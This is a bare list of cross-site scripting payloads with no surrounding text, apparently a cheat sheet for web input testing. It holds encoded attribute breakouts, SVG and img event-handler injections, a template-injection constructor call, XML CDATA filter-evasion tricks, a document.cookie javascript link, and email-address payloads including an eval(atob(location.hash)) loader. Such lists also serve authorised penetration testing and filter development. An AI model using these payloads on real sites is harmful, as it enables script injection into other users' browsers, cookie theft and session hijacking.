%27%29%3bconfirm%28%271
["');alert('XSS');//"]@xyz.xxx
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<iframe <><a href=javascript&colon;alert(document.cookie)>Click Here</a>=&gt;&lt;/iframe&gt;
a"><svg/onload=prompt(1)>
\'-alert(1)//
%7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D
%27"><details%20ontoggle=prompt('XSS')%20open>
"\u003e\u003cimg src=1 onerror=alert(0)\u003e
%26%2302java%26%23115cript:alert(document.domain)
DrakenKun"onfocus="prompt(1)"autofocus="

//XML
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"

//Email
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
"<iframe/onload=eval(atob(location.hash.substring(1)))>"@gmail.com
